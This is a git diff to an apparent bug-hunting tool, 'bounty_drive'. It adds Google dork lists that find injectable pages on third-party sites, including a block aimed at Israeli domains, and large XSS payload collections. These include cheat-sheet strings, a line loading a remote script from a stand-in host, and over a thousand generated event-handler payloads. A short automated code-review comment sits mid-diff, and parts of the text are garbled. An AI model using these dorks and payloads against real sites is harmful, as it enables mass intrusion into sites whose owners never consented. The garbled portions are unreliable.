diff --git a/INSTALL.md b/INSTALL.md index 02a1a8a..92e4f6f 100644 --- a/INSTALL.md +++ b/INSTALL.md @@ -1,5 +1,11 @@ # Installation +## Pre-Commit + +python3 -m pip install pre-commit +pre-commit installed at .git/hooks/pre-commit + + ## Classical ## PyPy \ No newline at end of file diff --git a/README.md b/README.md index 1ab5b70..b671d3d 100644 --- a/README.md +++ b/README.md @@ -11,15 +11,15 @@ make ``` ## Usage ```bash -python3 bounty_drive.py +python3 py ``` ```bash -Please specify the website extension(eg- .in,.com,.pk) [default: ] -----> +Please specify the website extension(eg- .in,.com,.pk) [default: ] -----> Do you want to restrict search to subdomain present in target.txt ? [default: true (vs false)] -----> true -Please specify the total no. of websites you want [default: 10] ----> -From which Google page you want to start(eg- 1,2,3) [default: 1] ----> -Do you want to do the Google dorking scan phase ? [default: true (vs false)] ----> +Please specify the total no. of websites you want [default: 10] ----> +From which Google page you want to start(eg- 1,2,3) [default: 1] ----> +Do you want to do the Google dorking scan phase ? [default: true (vs false)] ----> Do you want to do the Github dorking scan phase ? [default: true (vs false)] ----> false Do you want to test for XSS vulnerability ? [default: true (vs false)] ----> true Do you want to encode XSS payload ? [default: true (vs false)] ----> false @@ -40,6 +40,10 @@ Updated at 2024-02-18 15:32:02 UTC. TODO: we should proxy proxy chains +## TODO + +- use singletons for config !!! + # HAPPY HUNTING @@ -64,5 +68,7 @@ https://github.com/spekulatius/infosec-dorks https://github.com/RevoltSecurities/Subdominator +https://github.com/Raghavd3v/CRLFsuite/blob/main/crlfsuite/db/wafsignatures.json + # TODO add a vulnerable wordpress plugin and then dork to find vulnerable wordpress sites \ No newline at end of file 
diff --git a/bounty_drive/attacks/dorks/dorking_config.py b/bounty_drive/attacks/dorks/dorking_config.py index f001011..310611d 100644 --- a/bounty_drive/attacks/dorks/dorking_config.py +++ b/bounty_drive/attacks/dorks/dorking_config.py @@ -1 +1,6 @@ -SUBDOMAIN = None # TODO use target.txt and allow multiple domain +class DorkingConfig: + SUBDOMAIN = [] # TODO use target.txt and allow multiple domain + CRAWL = False + + +dorking_config = DorkingConfig() diff --git a/bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt b/bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt index 24492fa..28fc5c8 100644 --- a/bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt +++ b/bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt @@ -22,9 +22,9 @@ /view.php?PID= /view.php?PID= /winners.php?year=2008&type= /winners.php?year=2008&type= /winners.php?year=2008&type= /winners.php?year=2008&type= -index.php?option=com_reservations&task=askope&nidser=2&namser= “com_reservations” -index.php?option=com_reservations&task=askope&nidser=2&namser= “com_reservations” -intext:”Website by Mile High Creative” +index.php?option=com_reservations&task=askope&nidser=2&namser= "com_reservations" +index.php?option=com_reservations&task=askope&nidser=2&namser= "com_reservations" +intext:"Website by Mile High Creative" inurl:.com/search.asp inurl:/poll/default.asp?catid= inurl:/products/classified/headersearch.php?sid= 
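Review bot: In `bounty_drive/attacks/dorks/dorking_config.py`, `SUBDOMAIN = []` is a mutable class attribute, so the list is shared by the class and every `DorkingConfig` instance, and an append through one reference changes the scope seen by all of them. Moving the state into the instance avoids this: `def __init__(self):` with `self.SUBDOMAIN = []` and `self.CRAWL = False`. The unset value also changes from `None` to an empty list, and the README prompt describes this setting as the restriction to subdomains in target.txt. Callers are not visible in this diff, so check that any `is None` test still behaves as intended and that an empty list means "no targets loaded, do not scan" rather than an unrestricted search; a comment such as `# empty list means no in-scope targets loaded; callers must not fall back to an unrestricted search` would record that. The module-level name `SUBDOMAIN` no longer exists, so any `from ...dorking_config import SUBDOMAIN` elsewhere in the project needs updating in the same commit.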
@@ -37,28 +37,28 @@ inurl:com_feedpostold/feedpost.php?url= inurl:headersearch.php?sid= inurl:scrapbook.php?id= inurl:search.php?q= -inurl:”.php?author=” -inurl:”.php?cat=” -inurl:”.php?cmd=” -inurl:”.php?feedback=” -inurl:”.php?file=” -inurl:”.php?from=” -inurl:”.php?keyword=” -inurl:”.php?mail=” -inurl:”.php?max=” -inurl:”.php?pass=” -inurl:”.php?q=” -inurl:”.php?query=” -inurl:”.php?search=” -inurl:”.php?searchstring=” -inurl:”.php?searchst­ring=” -inurl:”.php?tag=” -inurl:”.php?txt=” -inurl:”.php?vote=” -inurl:”.php?years=” -inurl:”.php?z=” -inurl:”contentPage.php?id=” -inurl:”displayResource.php?id=” +inurl:".php?author=" +inurl:".php?cat=" +inurl:".php?cmd=" +inurl:".php?feedback=" +inurl:".php?file=" +inurl:".php?from=" +inurl:".php?keyword=" +inurl:".php?mail=" +inurl:".php?max=" +inurl:".php?pass=" +inurl:".php?q=" +inurl:".php?query=" +inurl:".php?search=" +inurl:".php?searchstring=" +inurl:".php?searchst­ring=" +inurl:".php?tag=" +inurl:".php?txt=" +inurl:".php?vote=" +inurl:".php?years=" +inurl:".php?z=" +inurl:"contentPage.php?id=" +inurl:"displayResource.php?id=" pages/match_report.php?mid= pages/match_report.php?mid= inurl:/search?query= inurl:/login?username= diff --git a/bounty_drive/attacks/dorks/google/xss/XSS-HTML-CGPT.txt b/bounty_drive/attacks/dorks/google/xss/XSS-HTML-CGPT.txt new file mode 100644 index 0000000..8cae83f --- /dev/null +++ b/bounty_drive/attacks/dorks/google/xss/XSS-HTML-CGPT.txt @@ -0,0 +1,1359 @@ +

intext:"mysql_numrows()" +site:il

intext:"GetArray()" +site:il

intext:"FetchRow()" +site:il

intext:"Input -string was not in a correct format" +site:il -Using "site:.il" will limit the search to only Israel -domains. -Use SQLi dorks and just add "site:.il" to the -begining of the query, -example below: site:.il inurl:news?id= site:.il inurl:viewshowdetail.php?id= site:.il inurl:clubpage.php?id= @@ -123,7 +117,6 @@ site:.il inurl:tradeCategory.php?id= site:.il inurl:product_ranges_view.php?ID= site:.il inurl:shop_category.php?id= site:.il inurl:transcript.php?id= -Code: inurl:".php?cmd=" inurl:".php?z=" inurl:".php?q=" @@ -148,155 +141,4 @@ inurl:com_feedpostold/feedpost.php?url= inurl:scrapbook.php?id= inurl:headersearch.php?sid= inurl:/poll/default.asp?catid= -inurl:/search_results.php?search= -XSS Cheats -Code: -'';!--"=&{()} -'>//\\,<'>">">"*" -'); alert('XSS - - - - - - -"> - - -ipt>alert('XSS');ipt> -'); ? -> - - - - - -"> - - - - - - - - -
-window.alert("Bonjour !"); -
- onload=alert('X -SS')> -"> -'">>

XSS

- - - - -alert("XSS")'?> - -" onfocus=alert(document.domain) "> <" - -
  • XSS -perl -e 'print \"alert(\"XSS\")\";' > out -perl -e 'print \"\";' > out -
    -alert(1) -
    - -"> -[color=red width=expression(alert(123))][color] - -Execute(MsgBox(chr(88)&chr(83)&chr(83)))< -"> - -'"> -'"> -<<< - - -'> -'>"> - -a="get";b="URL";c="javascript:";d="alert('xss -');";eval(a+b+c+d); -='> -"+src=" http://yoursite.com/xss.js? -69,69 "> -> -">/XaDoS/> -src=" http://www.site.com/XSS.js "> -data:text/html;charset=utf-7;base64,Ij48L -3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTM -zNyk8L3NjcmlwdD4= -!--" /> - -

    XSS by xss

    -">>

    XSS by xss

    -'">

    XSS by xss

    -

    XSS by -xss

    -">">>

    XSS by xss

    - +
    drag me
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    +
    drag me
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
  • drop here
  • +
    drag me
  • drop here
  • +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here
    +
    drag me
    drop here
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    +
    drag me
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    +
    drag me
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
      drop here
    +
    drag me
      drop here
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    +
    drag me
    +
    drag me
    drop here +
    drag me
    drop here +
    drag me

    drop here

    +
    drag me

    drop here

    +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here +
    drag me
    drop here</plaintext> +<div draggable="true" contenteditable>drag me</div><plaintext ondrop=alert(1) contenteditable>drop here</plaintext> +<div draggable="true" contenteditable>drag me</div><pre ondragover=alert(1) contenteditable>drop here</pre> +<div draggable="true" contenteditable>drag me</div><pre ondrop=alert(1) contenteditable>drop here</pre> +<div draggable="true" contenteditable>drag me</div><progress ondragover=alert(1) contenteditable>drop here</progress> +<div draggable="true" contenteditable>drag me</div><progress ondrop=alert(1) contenteditable>drop here</progress> +<div draggable="true" contenteditable>drag me</div><q ondragover=alert(1) contenteditable>drop here</q> +<div draggable="true" contenteditable>drag me</div><q ondrop=alert(1) contenteditable>drop here</q> +<div draggable="true" contenteditable>drag me</div><rb ondragover=alert(1) contenteditable>drop here</rb> +<div draggable="true" contenteditable>drag me</div><rb ondrop=alert(1) contenteditable>drop here</rb> +<div draggable="true" contenteditable>drag me</div><rp ondragover=alert(1) contenteditable>drop here</rp> +<div draggable="true" contenteditable>drag me</div><rp ondrop=alert(1) contenteditable>drop here</rp> +<div draggable="true" contenteditable>drag me</div><rt ondragover=alert(1) contenteditable>drop here</rt> +<div draggable="true" contenteditable>drag me</div><rt ondrop=alert(1) contenteditable>drop here</rt> +<div draggable="true" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc> +<div draggable="true" contenteditable>drag me</div><rtc ondrop=alert(1) contenteditable>drop here</rtc> +<div draggable="true" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby> +<div draggable="true" contenteditable>drag me</div><ruby ondrop=alert(1) contenteditable>drop here</ruby> +<div draggable="true" contenteditable>drag me</div><s ondragover=alert(1) contenteditable>drop here</s> +<div draggable="true" 
contenteditable>drag me</div><s ondrop=alert(1) contenteditable>drop here</s> +<div draggable="true" contenteditable>drag me</div><samp ondragover=alert(1) contenteditable>drop here</samp> +<div draggable="true" contenteditable>drag me</div><samp ondrop=alert(1) contenteditable>drop here</samp> +<div draggable="true" contenteditable>drag me</div><script ondragover=alert(1) contenteditable>drop here</script> +<div draggable="true" contenteditable>drag me</div><script ondrop=alert(1) contenteditable>drop here</script> +<div draggable="true" contenteditable>drag me</div><section ondragover=alert(1) contenteditable>drop here</section> +<div draggable="true" contenteditable>drag me</div><section ondrop=alert(1) contenteditable>drop here</section> +<div draggable="true" contenteditable>drag me</div><select ondragover=alert(1) contenteditable>drop here</select> +<div draggable="true" contenteditable>drag me</div><select ondrop=alert(1) contenteditable>drop here</select> +<div draggable="true" contenteditable>drag me</div><shadow ondragover=alert(1) contenteditable>drop here</shadow> +<div draggable="true" contenteditable>drag me</div><shadow ondrop=alert(1) contenteditable>drop here</shadow> +<div draggable="true" contenteditable>drag me</div><slot ondragover=alert(1) contenteditable>drop here</slot> +<div draggable="true" contenteditable>drag me</div><slot ondrop=alert(1) contenteditable>drop here</slot> +<div draggable="true" contenteditable>drag me</div><small ondragover=alert(1) contenteditable>drop here</small> +<div draggable="true" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small> +<div draggable="true" contenteditable>drag me</div><source ondragover=alert(1) contenteditable>drop here</source> +<div draggable="true" contenteditable>drag me</div><source ondrop=alert(1) contenteditable>drop here</source> +<div draggable="true" contenteditable>drag me</div><spacer ondragover=alert(1) contenteditable>drop here</spacer> +<div 
draggable="true" contenteditable>drag me</div><spacer ondrop=alert(1) contenteditable>drop here</spacer> +<div draggable="true" contenteditable>drag me</div><span ondragover=alert(1) contenteditable>drop here</span> +<div draggable="true" contenteditable>drag me</div><span ondrop=alert(1) contenteditable>drop here</span> +<div draggable="true" contenteditable>drag me</div><strike ondragover=alert(1) contenteditable>drop here</strike> +<div draggable="true" contenteditable>drag me</div><strike ondrop=alert(1) contenteditable>drop here</strike> +<div draggable="true" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong> +<div draggable="true" contenteditable>drag me</div><strong ondrop=alert(1) contenteditable>drop here</strong> +<div draggable="true" contenteditable>drag me</div><style ondragover=alert(1) contenteditable>drop here</style> +<div draggable="true" contenteditable>drag me</div><style ondrop=alert(1) contenteditable>drop here</style> +<div draggable="true" contenteditable>drag me</div><sub ondragover=alert(1) contenteditable>drop here</sub> +<div draggable="true" contenteditable>drag me</div><sub ondrop=alert(1) contenteditable>drop here</sub> +<div draggable="true" contenteditable>drag me</div><summary ondragover=alert(1) contenteditable>drop here</summary> +<div draggable="true" contenteditable>drag me</div><summary ondrop=alert(1) contenteditable>drop here</summary> +<div draggable="true" contenteditable>drag me</div><sup ondragover=alert(1) contenteditable>drop here</sup> +<div draggable="true" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup> +<div draggable="true" contenteditable>drag me</div><svg ondragover=alert(1) contenteditable>drop here</svg> +<div draggable="true" contenteditable>drag me</div><svg ondrop=alert(1) contenteditable>drop here</svg> +<div draggable="true" contenteditable>drag me</div><table ondragover=alert(1) contenteditable>drop here</table> +<div 
draggable="true" contenteditable>drag me</div><table ondrop=alert(1) contenteditable>drop here</table> +<div draggable="true" contenteditable>drag me</div><tbody ondragover=alert(1) contenteditable>drop here</tbody> +<div draggable="true" contenteditable>drag me</div><tbody ondrop=alert(1) contenteditable>drop here</tbody> +<div draggable="true" contenteditable>drag me</div><td ondragover=alert(1) contenteditable>drop here</td> +<div draggable="true" contenteditable>drag me</div><td ondrop=alert(1) contenteditable>drop here</td> +<div draggable="true" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template> +<div draggable="true" contenteditable>drag me</div><template ondrop=alert(1) contenteditable>drop here</template> +<div draggable="true" contenteditable>drag me</div><textarea ondragover=alert(1) contenteditable>drop here</textarea> +<div draggable="true" contenteditable>drag me</div><textarea ondrop=alert(1) contenteditable>drop here</textarea> +<div draggable="true" contenteditable>drag me</div><tfoot ondragover=alert(1) contenteditable>drop here</tfoot> +<div draggable="true" contenteditable>drag me</div><tfoot ondrop=alert(1) contenteditable>drop here</tfoot> +<div draggable="true" contenteditable>drag me</div><th ondragover=alert(1) contenteditable>drop here</th> +<div draggable="true" contenteditable>drag me</div><th ondrop=alert(1) contenteditable>drop here</th> +<div draggable="true" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead> +<div draggable="true" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable>drop here</thead> +<div draggable="true" contenteditable>drag me</div><time ondragover=alert(1) contenteditable>drop here</time> +<div draggable="true" contenteditable>drag me</div><time ondrop=alert(1) contenteditable>drop here</time> +<div draggable="true" contenteditable>drag me</div><title ondragover=alert(1) contenteditable>drop here</title> +<div 
draggable="true" contenteditable>drag me</div><title ondrop=alert(1) contenteditable>drop here</title> +<div draggable="true" contenteditable>drag me</div><tr ondragover=alert(1) contenteditable>drop here</tr> +<div draggable="true" contenteditable>drag me</div><tr ondrop=alert(1) contenteditable>drop here</tr> +<div draggable="true" contenteditable>drag me</div><track ondragover=alert(1) contenteditable>drop here</track> +<div draggable="true" contenteditable>drag me</div><track ondrop=alert(1) contenteditable>drop here</track> +<div draggable="true" contenteditable>drag me</div><tt ondragover=alert(1) contenteditable>drop here</tt> +<div draggable="true" contenteditable>drag me</div><tt ondrop=alert(1) contenteditable>drop here</tt> +<div draggable="true" contenteditable>drag me</div><u ondragover=alert(1) contenteditable>drop here</u> +<div draggable="true" contenteditable>drag me</div><u ondrop=alert(1) contenteditable>drop here</u> +<div draggable="true" contenteditable>drag me</div><ul ondragover=alert(1) contenteditable>drop here</ul> +<div draggable="true" contenteditable>drag me</div><ul ondrop=alert(1) contenteditable>drop here</ul> +<div draggable="true" contenteditable>drag me</div><var ondragover=alert(1) contenteditable>drop here</var> +<div draggable="true" contenteditable>drag me</div><var ondrop=alert(1) contenteditable>drop here</var> +<div draggable="true" contenteditable>drag me</div><video ondragover=alert(1) contenteditable>drop here</video> +<div draggable="true" contenteditable>drag me</div><video ondrop=alert(1) contenteditable>drop here</video> +<div draggable="true" contenteditable>drag me</div><wbr ondragover=alert(1) contenteditable>drop here</wbr> +<div draggable="true" contenteditable>drag me</div><wbr ondrop=alert(1) contenteditable>drop here</wbr> +<div draggable="true" contenteditable>drag me</div><xmp ondragover=alert(1) contenteditable>drop here</xmp> +<div draggable="true" contenteditable>drag me</div><xmp ondrop=alert(1) 
contenteditable>drop here</xmp> +<div draggable="true" ondrag="alert(1)">test</div> +<div draggable="true" ondragend="alert(1)">test</div> +<div draggable="true" ondragenter="alert(1)">test</div> +<div draggable="true" ondragleave="alert(1)">test</div> +<div draggable="true" ondragstart="alert(1)">test</div> +<div id=x tabindex=1 onactivate=alert(1)></div> +<div id=x tabindex=1 onbeforeactivate=alert(1)></div> +<div id=x tabindex=1 onbeforedeactivate=alert(1)></div><input autofocus> +<div id=x tabindex=1 ondeactivate=alert(1)></div><input id=y autofocus> +<div id=x tabindex=1 onfocus=alert(1)></div> +<div id=x tabindex=1 onfocusin=alert(1)></div> +<div onbeforecopy="alert(1)" contenteditable>test</div> +<div onbeforecut="alert(1)" contenteditable>test</div> +<div onbeforepaste="alert(1)" contenteditable>test</div> +<div onblur=alert(1) tabindex=1 id=x></div><input autofocus> +<div onclick="alert(1)">test</div> +<div oncontextmenu="alert(1)">test</div> +<div oncopy="alert(1)" contenteditable>test</div> +<div oncut="alert(1)" contenteditable>test</div> +<div ondblclick="alert(1)">test</div> +<div onfocusout=alert(1) tabindex=1 id=x></div><input autofocus> +<div onkeydown="alert(1)" contenteditable>test</div> +<div onkeypress="alert(1)" contenteditable>test</div> +<div onkeyup="alert(1)" contenteditable>test</div> +<div onmousedown="alert(1)">test</div> +<div onmouseenter="alert(1)">test</div> +<div onmouseleave="alert(1)">test</div> +<div onmousemove="alert(1)">test</div> +<div onmouseout="alert(1)">test</div> +<div onmouseover="alert(1)">test</div> +<div onmouseup="alert(1)">test</div> +<div onpaste="alert(1)" contenteditable>test</div> +<dl draggable="true" ondrag="alert(1)">test</dl> +<dl draggable="true" ondragend="alert(1)">test</dl> +<dl draggable="true" ondragenter="alert(1)">test</dl> +<dl draggable="true" ondragleave="alert(1)">test</dl> +<dl draggable="true" ondragstart="alert(1)">test</dl> +<dl id=x tabindex=1 onactivate=alert(1)></dl> +<dl id=x tabindex=1 
onbeforeactivate=alert(1)></dl> +<dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus> +<dl id=x tabindex=1 ondeactivate=alert(1)></dl><input id=y autofocus> +<dl id=x tabindex=1 onfocus=alert(1)></dl> +<dl id=x tabindex=1 onfocusin=alert(1)></dl> +<dl onbeforecopy="alert(1)" contenteditable>test</dl> +<dl onbeforecut="alert(1)" contenteditable>test</dl> +<dl onbeforepaste="alert(1)" contenteditable>test</dl> +<dl onblur=alert(1) tabindex=1 id=x></dl><input autofocus> +<dl onclick="alert(1)">test</dl> +<dl oncontextmenu="alert(1)">test</dl> +<dl oncopy="alert(1)" contenteditable>test</dl> +<dl oncut="alert(1)" contenteditable>test</dl> +<dl ondblclick="alert(1)">test</dl> +<dl onfocusout=alert(1) tabindex=1 id=x></dl><input autofocus> +<dl onkeydown="alert(1)" contenteditable>test</dl> +<dl onkeypress="alert(1)" contenteditable>test</dl> +<dl onkeyup="alert(1)" contenteditable>test</dl> +<dl onmousedown="alert(1)">test</dl> +<dl onmouseenter="alert(1)">test</dl> +<dl onmouseleave="alert(1)">test</dl> +<dl onmousemove="alert(1)">test</dl> +<dl onmouseout="alert(1)">test</dl> +<dl onmouseover="alert(1)">test</dl> +<dl onmouseup="alert(1)">test</dl> +<dl onpaste="alert(1)" contenteditable>test</dl> +<dt draggable="true" ondrag="alert(1)">test</dt> +<dt draggable="true" ondragend="alert(1)">test</dt> +<dt draggable="true" ondragenter="alert(1)">test</dt> +<dt draggable="true" ondragleave="alert(1)">test</dt> +<dt draggable="true" ondragstart="alert(1)">test</dt> +<dt id=x tabindex=1 onactivate=alert(1)></dt> +<dt id=x tabindex=1 onbeforeactivate=alert(1)></dt> +<dt id=x tabindex=1 onbeforedeactivate=alert(1)></dt><input autofocus> +<dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus> +<dt id=x tabindex=1 onfocus=alert(1)></dt> +<dt id=x tabindex=1 onfocusin=alert(1)></dt> +<dt onbeforecopy="alert(1)" contenteditable>test</dt> +<dt onbeforecut="alert(1)" contenteditable>test</dt> +<dt onbeforepaste="alert(1)" contenteditable>test</dt> 
+<dt onblur=alert(1) tabindex=1 id=x></dt><input autofocus> +<dt onclick="alert(1)">test</dt> +<dt oncontextmenu="alert(1)">test</dt> +<dt oncopy="alert(1)" contenteditable>test</dt> +<dt oncut="alert(1)" contenteditable>test</dt> +<dt ondblclick="alert(1)">test</dt> +<dt onfocusout=alert(1) tabindex=1 id=x></dt><input autofocus> +<dt onkeydown="alert(1)" contenteditable>test</dt> +<dt onkeypress="alert(1)" contenteditable>test</dt> +<dt onkeyup="alert(1)" contenteditable>test</dt> +<dt onmousedown="alert(1)">test</dt> +<dt onmouseenter="alert(1)">test</dt> +<dt onmouseleave="alert(1)">test</dt> +<dt onmousemove="alert(1)">test</dt> +<dt onmouseout="alert(1)">test</dt> +<dt onmouseover="alert(1)">test</dt> +<dt onmouseup="alert(1)">test</dt> +<dt onpaste="alert(1)" contenteditable>test</dt> +<element draggable="true" ondrag="alert(1)">test</element> +<element draggable="true" ondragend="alert(1)">test</element> +<element draggable="true" ondragenter="alert(1)">test</element> +<element draggable="true" ondragleave="alert(1)">test</element> +<element draggable="true" ondragstart="alert(1)">test</element> +<element id=x tabindex=1 onactivate=alert(1)></element> +<element id=x tabindex=1 onbeforeactivate=alert(1)></element> +<element id=x tabindex=1 onbeforedeactivate=alert(1)></element><input autofocus> +<element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus> +<element id=x tabindex=1 onfocus=alert(1)></element> +<element id=x tabindex=1 onfocusin=alert(1)></element> +<element onbeforecopy="alert(1)" contenteditable>test</element> +<element onbeforecut="alert(1)" contenteditable>test</element> +<element onbeforepaste="alert(1)" contenteditable>test</element> +<element onblur=alert(1) tabindex=1 id=x></element><input autofocus> +<element onclick="alert(1)">test</element> +<element oncontextmenu="alert(1)">test</element> +<element oncopy="alert(1)" contenteditable>test</element> +<element oncut="alert(1)" contenteditable>test</element> +<element 
ondblclick="alert(1)">test</element> +<element onfocusout=alert(1) tabindex=1 id=x></element><input autofocus> +<element onkeydown="alert(1)" contenteditable>test</element> +<element onkeypress="alert(1)" contenteditable>test</element> +<element onkeyup="alert(1)" contenteditable>test</element> +<element onmousedown="alert(1)">test</element> +<element onmouseenter="alert(1)">test</element> +<element onmouseleave="alert(1)">test</element> +<element onmousemove="alert(1)">test</element> +<element onmouseout="alert(1)">test</element> +<element onmouseover="alert(1)">test</element> +<element onmouseup="alert(1)">test</element> +<element onpaste="alert(1)" contenteditable>test</element> +<em draggable="true" ondrag="alert(1)">test</em> +<em draggable="true" ondragend="alert(1)">test</em> +<em draggable="true" ondragenter="alert(1)">test</em> +<em draggable="true" ondragleave="alert(1)">test</em> +<em draggable="true" ondragstart="alert(1)">test</em> +<em id=x tabindex=1 onactivate=alert(1)></em> +<em id=x tabindex=1 onbeforeactivate=alert(1)></em> +<em id=x tabindex=1 onbeforedeactivate=alert(1)></em><input autofocus> +<em id=x tabindex=1 ondeactivate=alert(1)></em><input id=y autofocus> +<em id=x tabindex=1 onfocus=alert(1)></em> +<em id=x tabindex=1 onfocusin=alert(1)></em> +<em onbeforecopy="alert(1)" contenteditable>test</em> +<em onbeforecut="alert(1)" contenteditable>test</em> +<em onbeforepaste="alert(1)" contenteditable>test</em> +<em onblur=alert(1) tabindex=1 id=x></em><input autofocus> +<em onclick="alert(1)">test</em> +<em oncontextmenu="alert(1)">test</em> +<em oncopy="alert(1)" contenteditable>test</em> +<em oncut="alert(1)" contenteditable>test</em> +<em ondblclick="alert(1)">test</em> +<em onfocusout=alert(1) tabindex=1 id=x></em><input autofocus> +<em onkeydown="alert(1)" contenteditable>test</em> +<em onkeypress="alert(1)" contenteditable>test</em> +<em onkeyup="alert(1)" contenteditable>test</em> +<em onmousedown="alert(1)">test</em> +<em 
onmouseenter="alert(1)">test</em> +<em onmouseleave="alert(1)">test</em> +<em onmousemove="alert(1)">test</em> +<em onmouseout="alert(1)">test</em> +<em onmouseover="alert(1)">test</em> +<em onmouseup="alert(1)">test</em> +<em onpaste="alert(1)" contenteditable>test</em> +<embed draggable="true" ondrag="alert(1)">test</embed> +<embed draggable="true" ondragend="alert(1)">test</embed> +<embed draggable="true" ondragenter="alert(1)">test</embed> +<embed draggable="true" ondragleave="alert(1)">test</embed> +<embed draggable="true" ondragstart="alert(1)">test</embed> +<embed id=x onfocus=alert(1) type=text/html> +<embed id=x onfocusin=alert(1) type=text/html> +<embed id=x tabindex=1 onactivate=alert(1)></embed> +<embed id=x tabindex=1 onbeforeactivate=alert(1)></embed> +<embed id=x tabindex=1 onbeforedeactivate=alert(1)></embed><input autofocus> +<embed id=x tabindex=1 ondeactivate=alert(1)></embed><input id=y autofocus> +<embed onbeforecopy="alert(1)" contenteditable>test</embed> +<embed onbeforecut="alert(1)" contenteditable>test</embed> +<embed onbeforepaste="alert(1)" contenteditable>test</embed> +<embed onblur=alert(1) tabindex=1 id=x></embed><input autofocus> +<embed onclick="alert(1)">test</embed> +<embed oncontextmenu="alert(1)">test</embed> +<embed oncopy="alert(1)" contenteditable>test</embed> +<embed oncut="alert(1)" contenteditable>test</embed> +<embed ondblclick="alert(1)">test</embed> +<embed onfocusout=alert(1) tabindex=1 id=x></embed><input autofocus> +<embed onkeydown="alert(1)" contenteditable>test</embed> +<embed onkeypress="alert(1)" contenteditable>test</embed> +<embed onkeyup="alert(1)" contenteditable>test</embed> +<embed onmousedown="alert(1)">test</embed> +<embed onmouseenter="alert(1)">test</embed> +<embed onmouseleave="alert(1)">test</embed> +<embed onmousemove="alert(1)">test</embed> +<embed onmouseout="alert(1)">test</embed> +<embed onmouseover="alert(1)">test</embed> +<embed onmouseup="alert(1)">test</embed> +<embed onpaste="alert(1)" 
contenteditable>test</embed> +<embed src=/ onload=alert(1)> +<embed src=1 onerror=alert(1) type=image/gif> +<fieldset draggable="true" ondrag="alert(1)">test</fieldset> +<fieldset draggable="true" ondragend="alert(1)">test</fieldset> +<fieldset draggable="true" ondragenter="alert(1)">test</fieldset> +<fieldset draggable="true" ondragleave="alert(1)">test</fieldset> +<fieldset draggable="true" ondragstart="alert(1)">test</fieldset> +<fieldset id=x tabindex=1 onactivate=alert(1)></fieldset> +<fieldset id=x tabindex=1 onbeforeactivate=alert(1)></fieldset> +<fieldset id=x tabindex=1 onbeforedeactivate=alert(1)></fieldset><input autofocus> +<fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus> +<fieldset id=x tabindex=1 onfocus=alert(1)></fieldset> +<fieldset id=x tabindex=1 onfocusin=alert(1)></fieldset> +<fieldset onbeforecopy="alert(1)" contenteditable>test</fieldset> +<fieldset onbeforecut="alert(1)" contenteditable>test</fieldset> +<fieldset onbeforepaste="alert(1)" contenteditable>test</fieldset> +<fieldset onblur=alert(1) tabindex=1 id=x></fieldset><input autofocus> +<fieldset onclick="alert(1)">test</fieldset> +<fieldset oncontextmenu="alert(1)">test</fieldset> +<fieldset oncopy="alert(1)" contenteditable>test</fieldset> +<fieldset oncut="alert(1)" contenteditable>test</fieldset> +<fieldset ondblclick="alert(1)">test</fieldset> +<fieldset onfocusout=alert(1) tabindex=1 id=x></fieldset><input autofocus> +<fieldset onkeydown="alert(1)" contenteditable>test</fieldset> +<fieldset onkeypress="alert(1)" contenteditable>test</fieldset> +<fieldset onkeyup="alert(1)" contenteditable>test</fieldset> +<fieldset onmousedown="alert(1)">test</fieldset> +<fieldset onmouseenter="alert(1)">test</fieldset> +<fieldset onmouseleave="alert(1)">test</fieldset> +<fieldset onmousemove="alert(1)">test</fieldset> +<fieldset onmouseout="alert(1)">test</fieldset> +<fieldset onmouseover="alert(1)">test</fieldset> +<fieldset onmouseup="alert(1)">test</fieldset> 
